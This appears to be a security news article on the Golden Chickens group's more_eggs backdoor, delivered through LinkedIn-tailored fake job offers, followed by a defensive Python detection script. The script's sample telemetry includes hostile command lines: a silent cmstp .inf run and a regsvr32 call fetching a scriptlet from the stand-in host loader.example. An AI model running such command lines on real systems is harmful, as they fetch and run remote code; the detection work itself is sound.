Top cyber crime gangs use targeted fake job offers to deploy stealthy backdoor


A group of criminals behind a stealthy backdoor known as more_eggs is targeting professionals with fake job offers tailored to them based on information from their LinkedIn profiles.

The gang is selling access to systems infected with the backdoor to other sophisticated cyber crime groups including FIN6, Evilnum and Cobalt Group that are known to target organisations from various industries.

Spearphishing with LinkedIn info

In a recent attack detected by researchers from managed detection and response firm eSentire, the hackers targeted a professional working in the healthcare technology industry with a phishing email mimicking a job offer for a position identical to the one the target had listed on their LinkedIn profile page. This seems to be a technique that this group, known in the security industry as the Golden Chickens, has also used in the past.

The emails carry a zip archive named after the job position on offer. Opening its contents launches a malicious component known as VenomLNK (a Windows shortcut, or LNK, file), which serves as the first stage of the more_eggs infection.

“Golden Chickens sell the backdoor under a malware-as-a-service (MaaS) arrangement to other cyber criminals,” eSentire’s research team said in its report. “Once more_eggs is on the victim’s computer system, the Golden Eggs’ seedy customers can go in and infect the system with any type of malware: ransomware, credential stealers, banking malware, or simply use the backdoor as a foothold into the victim’s network so as to exfiltrate data.”

The infection chain

Once executed on a victim’s machine, VenomLNK uses Windows Management Instrumentation (WMI), the built-in Windows management infrastructure that PowerShell and other scripting hosts can drive, to deploy the attack’s second stage: a malware loader known as TerraLoader. Because the process is started through WMI, the resulting child process is created by the WMI provider host (WmiPrvSE.exe) rather than by the shortcut itself, which is a useful detection point.

TerraLoader abuses two legitimate, Microsoft-signed Windows binaries, cmstp.exe and regsvr32.exe, to load the final payload, TerraPreter. TerraPreter is downloaded from servers hosted on Amazon AWS, so the traffic blends in with legitimate cloud traffic and is less likely to be blocked by network filters, and it is installed as an ActiveX control. ActiveX is Microsoft’s COM-based framework for embeddable components; such controls are registered with regsvr32 and can be loaded by Internet Explorer and other COM hosts, and the framework is supported natively on Windows.

TerraLoader also drops and opens a Microsoft Word document that’s designed to look like a legitimate employment application. This is used only as a decoy so the user doesn’t become suspicious after opening the email attachment.
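The chain described above, WMI starting a loader which then abuses cmstp.exe and regsvr32.exe, leaves a characteristic trail in process-creation telemetry. The following is an added detection example, not code from eSentire or from the article: it runs a few generic rules over constructed Sysmon-style process events (Image, ParentImage, CommandLine) and only escalates when a WMI-launched script host and a cmstp/regsvr32 abuse both appear on the same host. All paths, the user name, the URL and the command lines are hypothetical; the page does not give TerraLoader’s actual invocations, so the rules match the well-known abuse patterns of those binaries rather than any specific sample.

```python
"""Detection logic for a WMI -> cmstp/regsvr32 execution chain, run over
constructed process-creation events. Field names mimic Sysmon Event ID 1;
every path, user name, URL and command line below is hypothetical."""
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of its parent
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


# Script/command hosts that have no business being spawned by the WMI provider host.
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "cmstp.exe"}

# Parents from which cmstp.exe/regsvr32.exe are normally launched (installers,
# manual runs from explorer). Assumed baseline; tune it to the environment.
EXPECTED_LOLBIN_PARENTS = {"explorer.exe", "msiexec.exe", "services.exe", "setup.exe"}


def rule_wmi_spawn(ev: ProcEvent) -> bool:
    """Stage 1: the WMI provider host (WmiPrvSE.exe) starts a script or command host."""
    return basename(ev.parent_image) == "wmiprvse.exe" and basename(ev.image) in SCRIPT_HOSTS


def rule_cmstp_silent_inf(ev: ProcEvent) -> bool:
    """cmstp.exe run silently (/s or /ni) against an .inf profile: the classic abuse."""
    if basename(ev.image) != "cmstp.exe":
        return False
    tokens = ev.command_line.lower().split()
    return any(t.endswith(".inf") for t in tokens) and bool({"/s", "/ni"} & set(tokens))


def rule_regsvr32_remote(ev: ProcEvent) -> bool:
    """regsvr32.exe handed a URL or a scriptlet (/i:, scrobj.dll) instead of a local DLL."""
    if basename(ev.image) != "regsvr32.exe":
        return False
    cl = ev.command_line.lower()
    return bool(re.search(r"https?://", cl)) or "/i:" in cl or "scrobj" in cl


def rule_lolbin_odd_parent(ev: ProcEvent) -> bool:
    """cmstp.exe/regsvr32.exe launched by something other than an installer or explorer."""
    return (basename(ev.image) in {"cmstp.exe", "regsvr32.exe"}
            and basename(ev.parent_image) not in EXPECTED_LOLBIN_PARENTS)


RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("wmi_spawned_script_host", rule_wmi_spawn),
    ("cmstp_silent_inf", rule_cmstp_silent_inf),
    ("regsvr32_remote", rule_regsvr32_remote),
    ("lolbin_odd_parent", rule_lolbin_odd_parent),
]


def evaluate(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule that fires, in rule order."""
    return [(i, name) for i, ev in enumerate(events) for name, pred in RULES if pred(ev)]


def chain_detected(events: List[ProcEvent]) -> bool:
    """Escalate only when a WMI-launched stage AND a cmstp/regsvr32 abuse both appear;
    either signal alone is far noisier in a real fleet."""
    fired = {name for _, name in evaluate(events)}
    return "wmi_spawned_script_host" in fired and bool(
        fired & {"cmstp_silent_inf", "regsvr32_remote", "lolbin_odd_parent"})


# Constructed sample telemetry from one host (hypothetical paths, user and URL).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\explorer.exe", r"WINWORD.EXE /n"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\wbem\WmiPrvSE.exe",
              r"cmd.exe /c C:\Users\alice\AppData\Local\Temp\stage2.cmd"),
    ProcEvent(r"C:\Windows\System32\cmstp.exe", r"C:\Windows\System32\cmd.exe",
              r"cmstp.exe /ni /s C:\Users\alice\AppData\Local\Temp\profile.inf"),
    ProcEvent(r"C:\Windows\System32\regsvr32.exe", r"C:\Windows\System32\cmd.exe",
              r"regsvr32.exe /s /u /i:https://loader.example/stage3.sct scrobj.dll"),
    # Benign: an installer registering its own local control must not fire.
    ProcEvent(r"C:\Windows\System32\regsvr32.exe", r"C:\Windows\System32\msiexec.exe",
              r"regsvr32.exe /s C:\Program Files\Vendor\control.dll"),
]

if __name__ == "__main__":
    for idx, rule in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
    print("chain detected:", chain_detected(SAMPLE_EVENTS))
```

The parent-process baseline is the rule most likely to need tuning: deployment tools and some installers launch regsvr32 legitimately, so extend EXPECTED_LOLBIN_PARENTS from your own telemetry before alerting on lolbin_odd_parent alone. The WMI rule is the stronger signal, since WmiPrvSE.exe spawning cmd.exe or PowerShell is rare outside of management tooling you can allow-list explicitly.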
